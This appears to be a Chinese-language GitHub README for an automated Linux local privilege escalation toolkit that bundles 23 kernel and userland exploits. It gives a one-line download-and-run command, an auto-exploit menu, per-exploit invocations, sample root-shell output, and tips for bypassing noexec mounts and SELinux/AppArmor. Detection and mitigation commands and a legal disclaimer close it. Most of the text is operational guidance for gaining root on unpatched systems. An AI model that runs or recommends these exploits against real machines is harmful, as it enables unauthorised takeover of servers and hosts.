khadafigans/LPE-Toolkit
GitHub: khadafigans/LPE-Toolkit
一款集成 23 个 Linux 本地提权漏洞利用的自动化工具包,专为渗透测试与安全研究设计。
Stars: 4 | Forks: 2
# Linux LPE 自动利用工具包 2026 (xpl2026)
```
VENI | VIDI | VICI
```
**版本:** 2.3-universal
**组织:** BOB MARLEY LABS
**注意:我将此漏洞利用工具放入 GitHub 的原因是它是免费的,服务器托管非常昂贵,而且我的钱包已经撑不住了。此外,Source-Code 目录中是每个 LPE 原始并经过微调的源代码,它可能并不完整 / 优秀 / 出色 / 真实,该目录中包含的所有源代码可能都是误报。请使用 xpl2026.tgz 进行自动获取 root 权限**
## 目录
- [概述](#overview)
- [功能](#features)
- [工具包内容](#toolkit-contents)
- [快速开始](#quick-start)
- [漏洞利用详情](#exploit-details)
- [使用示例](#usage-examples)
- [系统要求](#system-requirements)
- [故障排除](#troubleshooting)
- [高级用法](#advanced-usage)
- [检测与防御](#detection--defense)
- [法律声明](#legal-notice)
- [快速参考](#quick-reference)
## 概述
**xpl2026** 工具包包含 23 个 Linux 本地提权 (LPE) 漏洞利用程序,专为渗透测试和安全研究而设计。所有漏洞利用程序均被编译为**完全静态的二进制文件**,以实现跨不同 Linux 发行版的最大可移植性和兼容性。
### 关键统计数据
- **漏洞利用总数:** 23
- **内核覆盖范围:** 2.6.x - 7.1.x
- **二进制文件大小:** 915KB (主工具包)
- **架构:** x86_64 (通用)
- **编译:** 完全静态 (无依赖)
## 功能
### 通用兼容性
- **完全静态的二进制文件** - 没有缺失库的问题
- **多发行版** - 适用于 RHEL、Debian、Ubuntu、CentOS、Fedora 等
- **多内核** - 涵盖从 2.6.x 到 7.1.x 的内核版本
- **支持 LSM 感知** - 检测并适配 SELinux、AppArmor
### 智能分析
- **自动检测** - 识别适用于您系统的漏洞利用
- **要求检查** - 在执行前验证前置条件
- **智能过滤** - 仅显示适用的漏洞利用
### 用户友好的界面
- **颜色编码输出** - 易于阅读的状态指示器
- **交互式菜单** - 简单的选择界面
- **自动利用** - 自动运行所有可行的漏洞利用
- **详细信息** - 查看漏洞利用详情和要求
## 工具包内容
### 完整漏洞利用列表
| # | 漏洞利用名称 | CVE | 二进制文件 | 大小 | 内核范围 |
|---|-------------|-----|--------|------|--------------|
| 1 | **CopyFail** | CVE-2026-31431 | copyfail-go-static | 2.1MB | 5.x - 7.x |
| 2 | **DirtyFrag** | CVE-2026-43284 | dirtyfrag-static | 877KB | 5.x - 7.x |
| 3 | **Fragnesia** | CVE-2026-46300 | fragnesia-static | 731KB | 5.x - 7.x |
| 4 | **Fragnesia v2** | 增强版 | fragnesia2-static | 827KB | 5.x - 7.x |
| 5 | **DirtyDecrypt** | CVE-2026-31635 | dirtydecrypt-static | 838KB | 5.x - 7.x |
| 6 | **PinTheft** | 页面缓存漏洞利用 | pintheft-static | 834KB | 5.x - 7.x |
| 7 | **CIFSwitch** | CVE-2026-46243 | cifswitch-static | 1.0MB | 5.x - 7.x |
| 8 | **PACKET_EDIT_MEME** | CVE-2026-46331 | packet-edit-meme-static | 755KB | 5.18 - 7.1 |
| 9 | **IPv6 Frag Escape** | 6.12.x 容器逃逸 | ipv6-frag-escape-static | 855KB | 6.12.0 - 6.12.x |
| 10 | **pidfd-race** | CVE-2026-46333 | pidfd-race-static | 923KB | 5.x - 7.x |
| 11 | **DirtyPipe** | CVE-2022-0847 | dirtypipe-static | 806KB | 5.8 - 5.16.11 |
| 12 | **Pack2TheRoot** | CVE-2026-41651 | pack2theroot-static | 789KB | 所有版本 (PackageKit) |
| 13 | **PwnKit** | CVE-2021-4034 | pwnkit-new-static | 778KB | 所有版本 (pkexec) |
| 14 | **OverlayFS** | CVE-2021-3493 | overlayfs-static | 826KB | 3.x - 5.11 |
| 15 | **OvFS+FUSE** | CVE-2023-0386 | ovfs-fuse-static | 826KB | 5.11+ |
| 16 | **Polkit D-Bus** | CVE-2021-3560 | polkit-dbus-static | 830KB | 所有版本 (polkit) |
| 17 | **Docker Socket** | Docker 逃逸 | docker-sock-static | 821KB | 容器 |
| 18 | **netfilter OOB** | CVE-2021-22555 | netfilter-oob-static | 811KB | 2.6.32 - 5.11 |
| 19 | **nft UAF2** | CVE-2022-2586 | nft-uaf2-static | 1.1MB | 5.x - 5.18 |
| 20 | **nft UAF** | CVE-2024-1086 | nft-uaf-static | 980KB | 5.x - 6.x |
| 21 | **DirtyClone** | CVE-2026-43503 | dirtyclone-static | 1023KB | 7.1-rc1 - 7.1-rc4 |
| 22 | **Bad Epoll** | CVE-2026-46242 | bad-epoll-static | 1015KB | lts-6.12.67 (针对特定目标) |
| 23 | **FUSE OOB** | CVE-2026-31694 | fuse-oob-static | 31KB | 6.15+ |
### 额外文件
```
xpl2026/
├── xpl2026 # Main toolkit executable (915KB)
├── copyfail-go-static # Exploit binaries
├── dirtyfrag-static
├── fragnesia-static
├── ... (all exploit binaries)
├── CVE-2026-41651/ # Exploit-specific directories
├── CVE-2026-41651-v2/
├── exploit # Legacy exploit (1.1MB)
├── proc_readdir_de # Additional exploit (1.1MB)
├── debian11-xpl2026 # Debian-specific variant
└── cve-2026-41651-almalinux8 # AlmaLinux-specific variant
```
## 快速开始
### 基本用法
```
# 导航到可写目录
wget https://github.com/khadafigans/LPE-Toolkit/raw/refs/heads/main/xpl2026.tgz --no-check-certificate
tar xzf xpl2026.tgz
rm -rf xpl2026.tgz
# 导航到 xpl2026 目录
cd xpl2026
# 使 Toolkit xpl2026 可执行
chmod +x xpl2026
# 运行 toolkit
./xpl2026
```
## 一行命令
```
wget https://github.com/khadafigans/LPE-Toolkit/raw/refs/heads/main/xpl2026.tgz --no-check-certificate && tar xzf xpl2026.tgz && rm -rf xpl2026.tgz && cd xpl2026 && chmod +x xpl2026 && ./xpl2026
```
### 自动利用(推荐)
工具包将会:
1. 分析您的系统
2. 识别可行的漏洞利用
3. 显示一个交互式菜单
**选择选项 [0] 进行自动利用:**
```
Your choice: 0
```
工具包将按顺序尝试所有可行的漏洞利用,直到有一个成功为止。
### 手动选择
运行特定的漏洞利用:
```
Your choice: 9 # Runs PACKET_EDIT_MEME
```
### 查看详细信息
```
Your choice: 99 # Shows detailed info about all exploits
```
## 漏洞利用详情
### 1. CopyFail (CVE-2026-31431)
**类型:** 页面缓存损坏
**内核:** 5.x - 7.x
**方法:** 写时复制绕过
**要求:** User namespaces
```
./copyfail-go-static
```
**详情:**
- 利用页面缓存处理中的竞争条件
- 损坏内存中的只读文件
- 无磁盘修改(隐蔽)
### 2. DirtyFrag (CVE-2026-43284)
**类型:** 分片处理漏洞
**内核:** 5.x - 7.x
**方法:** 网络缓冲区分片
**要求:** User namespaces
```
./dirtyfrag-static
```
**详情:**
- 利用网络栈中的分片机制
- 通过网络缓冲区损坏页面缓存
- 针对 `/usr/bin/su` 或类似的 SUID 二进制文件
### 3. Fragnesia (CVE-2026-46300)
**类型:** 内存分片漏洞利用
**内核:** 5.x - 7.x
**方法:** 堆喷射 + 分片
**要求:** User namespaces
```
./fragnesia-static
```
**详情:**
- 高级分片技术
- 多种损坏方法
- 在易受攻击的内核上成功率高
**Fragnesia v2:**
- 具有额外绕过功能的增强版
- 跨内核版本更好的兼容性
### 4. DirtyDecrypt (CVE-2026-31635)
**类型:** 加密子系统漏洞利用
**内核:** 5.x - 7.x
**方法:** 就地解密损坏
**要求:** User namespaces,加密子系统
```
./dirtydecrypt-static
```
**详情:**
- 利用内核加密操作
- 使用就地解密破坏内存
- 针对 SUID 二进制文件的页面缓存
### 5. PinTheft
**类型:** 页面驻留漏洞
**内核:** 5.x - 7.x
**方法:** 驻留/取消驻留竞争条件
**要求:** User namespaces
```
./pintheft-static
```
**详情:**
- 利用页面驻留机制
- 内存管理中的竞争条件
- 跨多个内核版本可靠
### 6. CIFSwitch (CVE-2026-46243)
**类型:** CIFS 文件系统漏洞
**内核:** 5.x - 7.x
**方法:** CIFS upcall 漏洞利用
**要求:** `/usr/sbin/cifs.upcall` 或 `/sbin/cifs.upcall`
```
./cifswitch-static
```
**详情:**
- 利用 CIFS 内核模块
- 需要存在 CIFS 实用程序
- 通过文件系统操作进行提权
### 7. pidfd-race (CVE-2026-46333)
**类型:** 进程文件描述符竞争
**内核:** 5.x - 7.x
**方法:** pidfd 处理中的竞争条件
**要求:** 支持 pidfd 的现代内核
```
./pidfd-race-static
```
**详情:**
- 利用 pidfd_open() 系统调用
- 进程管理中的竞争条件
- 干净的漏洞利用(无崩溃)
### 8. PACKET_EDIT_MEME (CVE-2026-46331)
**类型:** 网络调度器漏洞利用
**内核:** 5.18 - 7.1
**方法:** `act_pedit` 页面缓存投毒
**要求:** User namespaces,CAP_NET_ADMIN
```
# 标准 Linux
./packet-edit-meme-static
# 带有 AppArmor 的 Ubuntu
./packet-edit-meme-static --ubuntu
```
**详情:**
- 利用 `net/sched` 流量控制
- 破坏 `/usr/bin/su` 入口点
- 需要内核 >= 5.18(支持 act_pedit)
**已验证目标:**
- RHEL 10.0 (内核 6.12.0)
- Debian 13 (内核 6.12.90)
- Ubuntu 24.04 (内核 6.17.0) 配合 `--ubuntu` 标志
- Ubuntu 26.04 (AppArmor 绕过已关闭) - 不支持
### 9. IPv6 Fragment Escape
**类型:** 容器逃逸
**内核:** 6.12.0 - 6.12.x (RHEL/CentOS 10)
**方法:** IPv6 分片 + 脏页表
**要求:** x86_64,LA57 分页(5 级)
```
./ipv6-frag-escape-static
```
**详情:**
- 针对 RHEL/CentOS 10 容器
- 利用 IPv6 分片处理
- 需要 5 级分页 (LA57)
- 具备容器逃逸能力
**局限性:**
- 仅适用于内核 6.12.x
- 特定于 RHEL/CentOS 10
- 需要 LA57 CPU 特性
### 10. DirtyPipe (CVE-2022-0847)
**类型:** 管道缓冲区利用
**内核:** 5.8 - 5.16.11, 5.10.x - 5.10.102
**方法:** `pipe()` + `splice()` 损坏
**要求:** 无(通用)
```
./dirtypipe-static
```
**详情:**
- 最可靠的漏洞利用之一
- 适用于广泛的内核版本
- 干净且稳定的利用
- 通过管道缓冲区损坏只读文件
**成功率:** 在易受攻击的内核上非常高
### 11. PwnKit (CVE-20214034)
**类型:** PolicyKit 漏洞
**内核:** 所有版本
**方法:** `pkexec` 环境变量注入
**要求:** `/usr/bin/pkexec` 必须设置 setuid root
```
./pwnkit-static
```
**详情:**
- 利用 pkexec 二进制文件
- 参数处理漏洞
- 不接受参数 - 直接生成 root shell
- 如果 pkexec 是 setuid(模式 4755)则有效
**检查是否存在漏洞:**
```
ls -la /usr/bin/pkexec
# 如果显示 -rwsr-xr-x (setuid bit),则存在漏洞
```
### 12. OverlayFS (CVE-2021-3493)
**类型:** 文件系统漏洞
**内核:** 3.x - 5.11
**方法:** OverlayFS capability 绕过
**要求:** User namespaces,overlayfs 支持
```
./overlayfs-static
```
**详情:**
- 利用 OverlayFS 挂载操作
- 命名空间中的 capability 混淆
- 在 Ubuntu 18.04 - 20.10 上可靠
### 13. OvFS+FUSE (CVE-2023-0386)
**类型:** OverlayFS + FUSE 漏洞利用
**内核:** 5.11+
**方法:** FUSE + OverlayFS 交互
**要求:** FUSE 支持,User namespaces
```
./ovfs-fuse-static
```
**详情:**
- 结合 FUSE 和 OverlayFS
- 更复杂但兼容性更广
- 在修补了 CVE-2021-3493 的较新内核上有效
### 14. Polkit D-Bus (CVE-2021-3560)
**类型:** PolicyKit D-Bus 漏洞
**内核:** 所有版本
**方法:** D-Bus 消息竞争条件
**要求:** `dbus-send` 命令,polkit 服务
```
./polkit-dbus-static
```
**详情:**
- 利用 polkit D-Bus API
- 消息处理中的竞争条件
- 需要活动的 D-Bus 会话
### 15. Docker Socket
**类型:** 容器逃逸
**内核:** 所有版本 (容器)
**方法:** Docker socket 挂载
**要求:** `/var/run/docker.sock` 可写
```
./docker-sock-static
```
**详情:**
- 从 Docker 容器中逃逸
- 需要错误配置的 Docker socket
- 将宿主机文件系统挂载到容器中
### 16. Pack2TheRoot (CVE-2026-41651)
**类型:** D-Bus PackageKit 竞争
**内核:** 所有版本
**方法:** PackageKit InstallFiles 竞争至 root
**要求:** `dbus-send`,PackageKit 服务
```
./pack2theroot-static
```
**详情:**
- 原始 D-Bus 客户端(无 libdbus)
- 利用 PackageKit 的 SIMULATE/NONE 标志竞争
- 触发具有 root 权限的 postinst 执行
- 在 `/var/tmp/.suid_bash` 处释放 setuid-root 的 bash
### 17. netfilter OOB (CVE-2021-22555)
**类型:** Netfilter 越界写入
**内核:** 2.6.19 - 5.12
**方法:** ip_tables 损坏
```
./netfilter-oob-static
```
**详情:**
- 经典的内核堆利用
- netfilter 子系统中的越界写入
- 在旧内核上可靠
### 18. nft UAF2 (CVE-2022-2586)
**类型:** Nftables 释放后使用
**内核:** 5.x - 6.x
**方法:** nftables 链 UAF
```
./nft-uaf2-static
```
**详情:**
- nftables 子系统中的释放后使用
- 旨在创建 r00t 账户
- 需要 user 和 net 命名空间
### 19. nft UAF (CVE-2024-1086)
**类型:** Netfilter 释放后使用
**内核:** 5.x - 6.x
**方法:** Notselwyn 多文件 nftables
```
./nft-uaf-static
```
**详情:**
- 多文件 nftables UAF 漏洞利用
- 包含自定义的 libnftnl/libmnl 库
- 高度可靠的漏洞利用原语
### 20. DirtyClone (CVE-2026-43503)
**类型:** 通过 ESP-in-UDP 损坏页面缓存
**内核:** 7.1-rc1 - 7.1-rc4
**方法:** XFRM ESP TEE netfilter target
```
./dirtyclone-static
```
**详情:**
- ESP-in-UDP TEE 损坏 `/etc/passwd` 页面缓存
- 包含独立的 AES-128-CBC 实现
- 创建无密码的 root 账户
- 针对非常新的内核(rc 版本)
### 21. Bad Epoll (CVE-2026-46242)
**类型:** epoll 关闭与关闭竞争 UAF
**内核:** lts-6.12.67 (针对特定目标)
**方法:** epoll 文件描述符竞争
```
./bad-epoll-static
```
**详情:**
- **针对特定目标的偏移量** - 默认适用于 lts-6.12.67 (kernelCTF)
- 为您的内核自定义 `OFF_*` 和 `PIVOT*` 宏定义
- 需要访问 `/proc/kallsyms` (kptr_restrict=0)
- 两个 epoll 对 + timerfd IRQ 扩大
- **注意:** 许多发行版向后移植了修复程序 (commit `a6dc643c6931`)
### 22. FUSE OOB (CVE-2026-31694)
**类型:** FUSE readdir 缓存溢出
**内核:** 6.15+
**方法:** fuse_add_dirent_to_cache() 越界写入
```
./fuse-oob-static
```
**详情:**
- 向相邻的页面缓存页溢出 24 个字节
- 使 `/etc/passwd` 中的 root 变为无密码
- 需要 `fusermount3`
- 针对非常新的内核 (6.15+)
## 使用示例
### 示例 1:基本扫描
```
$ ./xpl2026
╔══════════════════════════════════════════════════════════════╗
║ Linux LPE Auto-Exploit Toolkit 2026 v2.0-universal ║
║ BOB MARLEY LABS ║
║ Universal | Static | Multi-Arch | LSM-Aware ║
╚══════════════════════════════════════════════════════════════╝
[*] System Information:
OS: Linux 5.15.0-1089-azure
Kernel: 5.15.0-1089-azure
Architecture: x86_64
User: testuser (uid=1002)
[*] Analyzing vulnerabilities...
╔══════════════════════════════════════════════════════════════╗
║ Available Exploits ║
╚══════════════════════════════════════════════════════════════╝
[1] ✓ CopyFail (CVE-2026-31431)
[2] ✓ DirtyFrag (CVE-2026-43284)
[3] ✓ Fragnesia (CVE-2026-46300)
...
[11] ✗ PwnKit (CVE-2021-4034) [Requirements not met]
...
[*] Found 13 viable exploits for this system
```
### 示例 2:自动利用
```
$ ./xpl2026
...
Your choice: 0
[*] Auto-exploitation mode enabled
[*] Will try 13 viable exploits in order...
[1/13] Trying: CopyFail (CVE-2026-31431)...
[+] Selected: CopyFail (CVE-2026-31431)
[*] Running exploit...
════════════════════════════════════════════════════════════════
[Exploit output...]
```
### 示例 3:特定漏洞利用
```
$ ./xpl2026
...
Your choice: 9
[+] Selected: PACKET_EDIT_MEME (CVE-2026-46331)
[*] Running exploit...
════════════════════════════════════════════════════════════════
[+] Kernel vulnerable!
[+] Corrupting /usr/bin/su...
[+] Spawning root shell...
# id
uid=0(root) gid=0(root) groups=0(root)
```
### 示例 4:直接执行漏洞利用
```
# 不使用 toolkit 直接运行 exploit
$ cd xpl2026
$ ./dirtypipe-static
[+] DirtyPipe (CVE-2022-0847)
[+] Checking kernel version...
[+] Kernel 5.10.75 vulnerable!
[+] Corrupting /usr/bin/su...
# id
uid=0(root) gid=0(root) groups=0(root)
```
## 系统要求
### 最低要求
- **架构:** x86_64 (64 位 Intel/AMD)
- **内存:** 512MB
- **磁盘:** 20MB 可用空间
- **内核:** Linux 2.6.x 或更高版本
### 推荐环境
- **发行版:** Ubuntu, Debian, RHEL, CentOS, Fedora, Arch
- **用户权限:** 非特权用户(漏洞利用将提权至 root)
- **网络:** 不需要(仅本地漏洞利用)
### 兼容性
**适用于:**
- 标准 Linux 发行版
- VPS (DigitalOcean, Linode, Vultr, OVH, Hetzner)
- 专用服务器
- 物理机
- 非云虚拟机 (VirtualBox, VMware, KVM)
**有限/不支持:**
- Microsoft Azure (内核强化)
- Google Cloud Platform (某些限制)
- AWS EC2 (某些限制)
- 经过大量补丁修补的企业系统
## 故障排除
### 问题:未发现可行的漏洞利用
**问题:**
```
[-] No viable exploits found for this system.
```
**解决方案:**
1. **检查内核版本:**
uname -r
- 如果 < 2.6.x:系统太旧
- 如果 >= 7.1-rc5:系统可能已被完全修补
2. **检查二进制文件:**
ls -lh xpl2026/
- 确保所有漏洞利用二进制文件都存在
3. **检查权限:**
chmod +x xpl2026/*.static xpl2026/xpl2026
### 问题:权限被拒绝
**问题:**
```
./xpl2026: Permission denied
```
**解决方案:**
```
chmod +x xpl2026
./xpl2026
```
### 问题:挂载在 noexec 文件系统上
**问题:**
```
./exploit: cannot execute binary file
```
**解决方案:**
**选项 1:使用 ld.so 加载器**
```
/lib64/ld-linux-x86-64.so.2 ./exploit
```
**选项 2:复制到可写位置**
```
cp ./exploit /tmp/
cd /tmp
./exploit
```
**选项 3:使用 /dev/shm**
```
cp ./exploit /dev/shm/
cd /dev/shm
./exploit
```
### 问题:GLIBC 版本不匹配
**问题:**
```
./exploit: version `GLIBC_2.34' not found
```
**解决方案:**
- 某些二进制文件可能需要更新的 GLIBC
- 工具包经过静态编译以尽量减少这种情况
- 尝试不同的漏洞利用 - 它们有不同的要求
### 问题:漏洞利用失败
**常见原因:**
1. **系统已打补丁:**
# 检查安全更新
dpkg -l | grep linux-image
2. **所需功能被禁用:**
# 检查 User namespaces
cat /proc/sys/kernel/unprivileged_userns_clone
# 应该为 1,而不是 0
3. **LSM 阻止 (SELinux/AppArmor):**
# 检查 SELinux
getenforce # 应该为 Permissive 或 Disabled
# 检查 AppArmor
aa-status # 检查是否存在限制性配置文件
4. **云提供商限制:**
- Azure 阻止 XFRM 操作
- GCP 可能阻止某些系统调用
- AWS 因实例类型而异
## 高级用法
### 批量测试
测试所有漏洞利用并记录结果:
```
#!/bin/bash
# test_all.sh
cd xpl2026
for exploit in *.static; do
echo "Testing: $exploit"
./"$exploit" 2>&1 | tee "../logs/${exploit}.log"
if [ $(id -u) -eq 0 ]; then
echo "SUCCESS: $exploit" >> ../results.txt
exit 0
else
echo "FAILED: $exploit" >> ../results.txt
fi
done
```
### 自定义漏洞利用集成
将您自己的漏洞利用添加到工具包:
1. **编译为静态二进制文件:**
gcc -static -O2 -o myexploit-static myexploit.c
strip myexploit-static
2. **复制到 xpl2026 目录:**
cp myexploit-static xpl2026/
3. **添加到 xpl2026.c:**
add_exploit("myexploit-static", "MyExploit", "CVE-XXXX-XXXXX");
4. **重新编译工具包:**
gcc -static -O2 -o xpl2026/xpl2026 xpl2026.c
### 静默模式(脚本集成)
用于自动化:
```
# 非交互式运行特定 exploit
cd xpl2026
./dirtypipe-static < /dev/null
```
### 特定内核测试
仅针对您的内核版本测试漏洞利用:
```
#!/bin/bash
kernel_ver=$(uname -r | cut -d. -f1,2)
if [[ "$kernel_ver" == "5."* ]]; then
./xpl2026 # Will auto-filter 5.x exploits
elif [[ "$kernel_ver" == "6."* ]]; then
./xpl2026 # Will show 6.x compatible exploits
fi
```
## 检测与防御
### 检测方法
**1. 进程监控:**
```
# 监视可疑的 namespace 创建
auditctl -a always,exit -F arch=b64 -S unshare -k namespace_abuse
```
**2. 文件完整性:**
```
# 监控 SUID binaries
aide --check /usr/bin/su /usr/bin/sudo
```
**3. Capability 监控:**
```
# 监视 user namespaces 中的 CAP_NET_ADMIN
auditctl -a always,exit -F arch=b64 -S capset -k capability_abuse
```
**4. 网络栈监控:**
```
# 监控 XFRM/IPsec 操作
auditctl -w /proc/net/xfrm_stat -p r -k xfrm_access
```
### 缓解策略
**1. 保持系统更新:**
```
# Ubuntu/Debian
apt update && apt upgrade
# RHEL/CentOS
yum update
# Fedora
dnf update
```
**2. 禁用 User Namespaces(如果不需要):**
```
echo 0 > /proc/sys/kernel/unprivileged_userns_clone
# 添加到 /etc/sysctl.conf:
kernel.unprivileged_userns_clone = 0
```
**3. 启用 AppArmor/SELinux:**
```
# AppArmor
aa-enforce /etc/apparmor.d/*
# SELinux
setenforce 1
```
**4. 加固 SUID 二进制文件:**
```
# 移除不必要的 SUID bits
chmod u-s /usr/bin/newgrp
chmod u-s /usr/bin/chfn
chmod u-s /usr/bin/chsh
```
**5. 使用内核强化:**
```
# 启用各种保护
sysctl -w kernel.dmesg_restrict=1
sysctl -w kernel.kptr_restrict=2
sysctl -w kernel.unprivileged_bpf_disabled=1
```
## 法律声明
仅供授权的渗透测试、漏洞赏金计划和教育目的使用。未经授权访问计算机系统在以下法律下是非法的:
- 计算机欺诈和滥用法案 (CFAA) - 美国
- 计算机滥用法案 1990 - 英国
- 欧盟网络安全法
此工具包提供用于:
- **授权的渗透测试**
- **受控环境中的安全研究**
- **CVE 验证和测试**
- **教育目的**
### 禁止用途
**切勿使用此工具包进行:**
- 未经授权的系统访问
- 恶意目的
- 未经明确许可攻击系统
- 任何非法活动
### 免责声明
**使用风险自负。** 作者对滥用行为不承担任何责任。
使用此工具即表示您确认拥有测试目标系统的明确授权。
## 快速参考
### 漏洞利用选择指南
| 您的内核 | 推荐的漏洞利用 |
|-------------|---------------------|
| 2.6.x - 3.x | netfilter OOB, OverlayFS |
| 4.x | OverlayFS, PwnKit, Polkit D-Bus |
| 5.8 - 5.16 | **DirtyPipe** (高度可靠) |
| 5.18 - 7.0 | **PACKET_EDIT_MEME**, CopyFail, DirtyFrag |
| 6.12.x | **IPv6 Frag Escape** (RHEL/CentOS 10) |
| 7.0 - 7.1-rc4 | CopyFail, Fragnesia |
### 命令速查表
```
# 基本用法
./xpl2026 # Interactive menu
# 自动 exploit
./xpl2026 << EOF
0
EOF
# 特定 exploit
./xpl2026 << EOF
9
EOF
# 查看信息
./xpl2026 << EOF
99
EOF
# 直接执行
./dirtypipe-static # Run exploit directly
```
**请我喝杯咖啡:**
```
₿ BTC: 17sbbeTzDMP4aMELVbLW78Rcsj4CDRBiZh
```
© 2026 khadafigans
标签:Cutter, Web报告查看器, 内核漏洞, 安全渗透, 客户端加密, 日志审计, 本地提权